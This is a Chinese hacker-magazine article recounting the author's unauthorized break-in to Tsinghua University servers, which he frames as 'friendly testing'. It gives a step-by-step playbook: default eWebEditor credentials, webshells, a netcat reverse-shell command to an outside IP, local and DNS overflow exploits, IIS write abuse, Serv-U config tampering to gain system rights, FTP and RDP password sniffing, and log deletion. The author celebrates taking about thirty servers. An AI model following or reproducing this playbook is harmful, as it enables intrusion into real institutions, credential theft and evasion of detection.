本文已发表于《黑客手册》第六期,转载请注明版权 ,本人此次纯属友情检测,没有对任何服务器造成伤害。文章涉及服务器已经全部打好补丁。请大家不要按图索骥,中国教育网络是脆弱的,请大家不要在给脆弱的心灵增加不必要的伤害 !
自上次偶利用ewebeditor存在的上传漏洞以及网站管理员的疏忽畅游了排名靠前的几所名牌大学后,在偶的心里留下了些许遗憾,就是中国排名前十的龙头老大清华没有进去过所以在那以后的日子里总想到这个全国最牛的高校去瞧瞧,再续我与中国名校的不解之缘。凑巧,五一到了,由于鄙人身无长物,一个人孤单的在校守着寝室,所以百无聊赖的我想借此良机免费检测一下清华大学。
一、 初探清华
五二了,一个人在寝室,天天不是逛坛子就是聊天,书怎么看不进去,无聊中想操家伙大干一场,目标是清华大学,像往常一样用明小子和阿D检测注入漏洞,在百度中输入inut:aspsite:.tsinghua.edu.cn,几个页面下来还真找到不少注入点,进入了几个后台,有上传的地方,但是无论我以何种方式上传皆是滴水不进,折腾了整个下午,还是后台权限,郁闷极了,算了,我想被我们这样的小菜搞怕了,我还是另辟蹊径,毕竟是世界有名的大学,岂是一般善男信女。
二、 清华,未眠夜之第一晚
1、 曙光再现
五三了,还是没有进展,基本上不想搞了,想放弃了,想起我曾经在检测清华大学ewebeditor漏洞的时候发现她还是有不少的站点用到这个在线文本编辑器的,不过不是密码强悍就是改了数据库路径,貌似太多了我还没有检测完,好,我再继续,呵呵,耐心地找了N页后终于让我找到一个可以成功进入ewebeditor后台的页面如图1,驾轻就熟拿下webshell如图2。不要告诉我不知道怎么拿webshell,不要问我,看前几期的黑手去。
图1 (登录界面)
图2 (轻松拿下webshell)
仿佛一切来得太容易了,接下来是提权了,唉,累了,睡觉吧,不急,有的是时间晚上再搞,没有睡午觉还真累了。
2、 未眠夜
一觉醒来快晚上十点了,放了几天假,生活规律也乱了,慌乱的到学校的食堂吃点东西回来继续,打开我的webshell,收集一切有利于我提权的信息,先net user发现有ASPNET用户,按照往常的惯例貌似支持解析aspx,可是我上传我的aspx木马,但是却不能解析,看来没有启动解析aspx的服务,netstat ?an 看到开了远程终端和pcanywhere
图3
没有找到43958端口,net start中看到服务器是有mssql,pcanywhere, Terminal Services,如图4,只有这几个对我们的提权有帮助,整理一下思路,
A、 有MSSQL,可以找sa用户和密码,通过sqlrootkit提权
B、 破解pcanywhere密码,如果登录密码和pcanywhere相同,呵呵,那就太好了
C、 本地溢出
结果前面两种思路都失败了,第一种,我找遍这个web目录,里面几个站点的sql帐号密码都是一般权限,没有找到sa权限的用户和密码。第二种密码成功破解,可以连接但是还是进不了电脑,郁闷了,看来只有试一下本地溢出,直接加用户没有成功看来是guest权限,在webshell中感觉很多命令不好使,用nc反向连接看看,上传nc , 在webshell的cmd命令中如入 D:\www-root\nerc\nc.exe-e c:\winnt\system32\cmd.exe 202.115.7.189 8081,如图5,在本地监听8081端口,命令为nc?l ?p 8081,不久就有反应了,如图6,加用户是肯定不行的,如图7,看来要找本地溢出的exp,夜已经很深了,窗外寂静如斯,此时的我灵台清明,睡意全无,翻阅以前的网络安全杂志(不久以前在旧书市场以低价购得,没看过),寻找关于本地溢出的敏感信息,终于找到一个,windowsCSRSS本地溢出漏洞,就是ms05018,呵呵来到放在职业欠钱空间里放的lcx空间下载了ms05018.exe,安焦编译的exp ,
武器找到了来到战场,上传运行如图8
图5
图六
图7
图8
哈哈,也许我运气好,也许是菜鸟必有天佑吧,我技术菜,运气再不好,我看就不要搞了,直接跳楼,我住在六楼,跳下去岂有命焉,不过幸运之神仿佛罩着我,每每在入侵低迷时候总给我以胜利的曙光,犹如神助,哈哈,成功添加了一个用户具有administrator权限的用户,成功登录 如图9,服务器里大小若二三十个院系站点。就这么拿下了,不过这样也花了我整整一个晚上,边看书便实践还真获益匪浅,清理一下战场,删除日志,退了出来,呵呵,看了看窗外,天边可以开始泛白,不知不觉中,天亮了,睡意也开始向我袭来,睡觉吧,人不是铁打的,身体要紧。
图9 (成功登录)
3、 感触良多
Ewebeditor在线文本编辑器上传漏洞出来这么久了,我写的那篇文章也出来一个多月了,网站管理人员还没有重视,在像清华这样名牌的大学漏洞重现,实非我等所愿,而且密码还是默认的admin/admin ,看来警报似乎没有敲响。对于这次安检鄙人获益良多,给我在以后的安检中积累了宝贵的经验。
三、 清华,未眠夜第二晚
1、iis写漏洞夜探清华
这几天似乎日夜颠倒了,昼伏夜行,简直成了黑蝙蝠,4号的晚上,白天网速慢,校园网就是这样到了晚上速度才有所改善,看了看时间,11点整,action,连接肉鸡,通过肉鸡登上昨天拿下的那台服务器,通过白天的查询知道166.111.0.0-166.111.255.255整个网段都是清华的,下载在iis写权限扫描工具里随意填上一个ip段,不久,就有收获了,如图10
图10
在iis写权限漏洞利用工具了填上有漏洞的ip,put含有你一句话木马的test.txt,点击提交数据包,如图11,然后在put的下拉菜单中点击move,最后提交数据包,就得到http://ip/shell.asp这个就是你的一句话马了,再用客户端连接就ok了。具体步骤可以看网上教程,以前的黑手上也有相关文章,这里我就不再赘述了。
图11
用海洋客户端成功连接如图12
图12
2、另类体权
既然已经得到webshell,先看看权限,郁闷,服务器相关数据和WScript.Shell程序运行器 都打不开 看来权限太低了。
图13
打开fso,浏览这个服务器的文件夹终于发现我的最爱serv-u,如图14,看来可以serv-u体权,先连接远程终端试试,结果失败。看来有两种可能A、原创终端没有打开; B、远程终端端口更改,下一步我可以这样执行A、通过serv-u.asp提权加用户,再上传开3389工具
B、看看servudaemon.ini有没有写权限,如果有,就可以得到一个cmd下系统权限;D、传鸽子
图14
也许是上帝的眷顾,幸运之神再次降临,servudaemon.ini可以写,于是我写了一个具有系统权限密码为空的用户进去,如图15
呵呵 ,ftp成功登陆,上传nc反向连接成功,如图16
图16
呵呵,很快先前肉鸡监听的8081有了反应,呵呵,是系统权限哦,成功添加用户如图17,用netstart查看发现开了远程终端,传个查看远程终端端口的vbs过去运行,得到端口为9001,成功连接如图18,今夜似乎比较顺利,继续测试,接着又拿下了几台,看了看表凌晨5点多,算了不搞了,看书一会书,睡觉。
图17
图18
3、 总结
IIS写漏洞前段时间闹得很火。但是还是有很多网络管理员不够重视,这也难怪,中国网管对网络安全意识本来就不高,也许他们根本不在乎。通过最近的安检发现nc简直是我们安检的至宝,似乎每时每刻都在用它,嘎嘎。关于nc的强大功能我会在以后的安检文章中通过实例给大家详细讲解!
四、清华未眠夜第三晚——溢出嗅探攻击
由于手中已经有一部分清华大学的主机了,此时此刻想到的当然是溢出了,溢出,是攻击服务器最快、最有效的一种方式,看着自己手中得到的服务器逐渐的多了起来,能够做的事情也就多了,内网溢出成功率高,那就测试一下刚出来的dns溢出吧,从网上搜集一下相关的介绍,下载exp开始测试.根据介绍先扫描53和445端口,在先前得到的服务器中扫描开53和445端口主机,看来有很多站点开了DNS这项服务,具体图我就不详细的展示给大家看了,看我溢出清华大学软件学院的站点给大家做个演示,根据扫描得知软件学院的ip段大约在166.111.80.*。我们扫描这个ip段开放445和53端口的主机,很快得到可以利用的主机,我们测试漏洞主机的系统端口。如下图19,
图19
开始溢出如图20
图20
Nc 正向连接得到系统权限的cmdshell 如图21
图21
加用户,远程登录,前后不到2分钟,就轻易的拿下,如图22、23
图22
图23
既然已经得到这个网段的一台主机就开始嗅探,关于cain嗅探的使用我就不再浪费纸张了,网上教程多的是,图24是在166.111.80.3上ftp嗅探
图24
3389嗅探如图25
图25
Flashfxp的利用,图26
图26
,就这样溢出、嗅探、通过得到主机中flashxp等等一切敏感信息,成功地拿下清华大学的一部分站点,如图26、图27
图27
图28
五、写在最后
清华大学的主站网段为166.111.4.*,而我也拿到了这个网段的一台主机,也就是说我可以进行arp欺骗和嗅探,郁闷的是嗅探到的尽是一些垃圾信息,我想渗透也应该到此结束了,已经拿下近30台服务器了,我也不会再搞了,毕竟是最崇拜的高等学府,搞得太出格,我怕警察叔叔请我去喝茶,算了,安检到此告一段落
